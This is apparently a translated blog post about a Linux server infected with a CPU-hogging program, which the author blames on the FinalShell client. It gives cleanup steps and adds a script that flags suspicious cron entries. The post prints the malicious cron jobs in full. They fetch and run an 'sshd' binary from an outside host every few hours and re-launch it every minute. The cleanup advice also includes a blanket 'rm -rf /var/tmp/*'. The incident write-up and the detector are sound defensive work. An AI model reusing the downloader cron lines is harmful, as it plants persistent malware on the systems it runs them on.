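Infected with a virus: reinstall the machine, and do not use **FinalShell** to connect to servers.
A record of how it showed up in my case.
After connecting to the machine with FinalShell, I saw it in the CPU usage graph on the left; I logged in to the machine and ran the commands, and it was indeed as shown below.
However, it did not appear when I used FinalShell to connect to my Alibaba Cloud / Tencent servers; perhaps the firewalls on those other servers are more complete.
Check CPU usage with top
Solution
Find the absolute path of the malicious program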
ll /proc/{pid}
Delete the malicious program and kill the process
rm -rf /var/tmp/*
kill -9 {pid}
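After a while, the malicious program is downloaded to the /var/tmp directory again and run. It turned out that malicious Linux scheduled tasks (cron jobs) existed; deleting them is enough!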
[root@vm-16-13-centos tmp]# crontab -l
*/5 * * * * flock -xn /tmp/stargate.lock -c '/usr/local/qcloud/stargate/admin/start.sh > /dev/null 2>&1 &'
0 */6 * * * /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
[root@vm-16-13-centos tmp]# cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/sshd -o sshd; cd /var/tmp; chmod 777 sshd; cd /var/tmp; wget -nc http://dash.cloudflare.ovh/mvt/config.json; cd /var/tmp; curl http://dash.cloudflare.ovh/mvt/config.json -o config.json'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
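As an added example (not part of the original post), the function below flags cron entries with the two traits visible in the output above: a wget/curl download inside a scheduled job, and running `./something` after changing into a world-writable directory. The function names, rule labels and sample lines (including the `bad.example` host) are constructed for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag cron entries that download files or run programs out of
# world-writable directories. Rule labels and sample lines are constructed.

# scan_cron [FILE...]: read cron lines from FILEs (or stdin) and print
# "reason<TAB>entry" for every suspicious entry.
scan_cron() {
    awk '
        /^[ \t]*#/ { next }                  # comment
        /^[ \t]*$/ { next }                  # blank line
        /^[ \t]*[A-Za-z_]+[ \t]*=/ { next }  # SHELL=, PATH=, MAILTO=
        {
            reason = ""
            # wget/curl pulling from an http(s) URL inside a scheduled job
            if ($0 ~ "(wget|curl)[ \t].*https?://")
                reason = "download"
            # cd into a world-writable directory, then run ./something
            if ($0 ~ "cd[ \t]+/(var/tmp|tmp|dev/shm)[ \t]*;[ \t]*[.]/")
                reason = (reason == "" ? "" : reason ",") "exec-from-tmp"
            if (reason != "") print reason "\t" $0
        }
    ' "$@"
}

# Constructed sample modeled on the entries above: one benign agent job,
# one downloader job and one job that runs the dropped binary.
sample_crontab() {
    cat <<'EOF'
SHELL=/bin/bash
# * * * * * user-name command to be executed
*/5 * * * * flock -xn /tmp/agent.lock -c '/usr/local/agent/start.sh > /dev/null 2>&1 &'
0 */6 * * * root /usr/bin/flock -n /var/tmp/tmp.lock -c 'cd /var/tmp; wget -nc http://bad.example/x/sshd; chmod 777 sshd'
* * * * * root /usr/bin/flock -n /var/tmp/vm.lock -c 'cd /var/tmp; ./sshd'
EOF
}

# With arguments, scan those files (for example /etc/crontab /etc/cron.d/*);
# without arguments, scan the constructed sample.
if [ "$#" -gt 0 ]; then scan_cron "$@"; else sample_crontab | scan_cron; fi
```

Both the per-user table (`crontab -l`) and `/etc/crontab` held the malicious entries in the output above, so every cron location on the host needs to be checked, not just one.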
Linux Crontab scheduled tasks
The difference between the /etc/crontab file and the crontab -e command
Original link: https://blog.csdn.net/liujinghu/article/details/125288926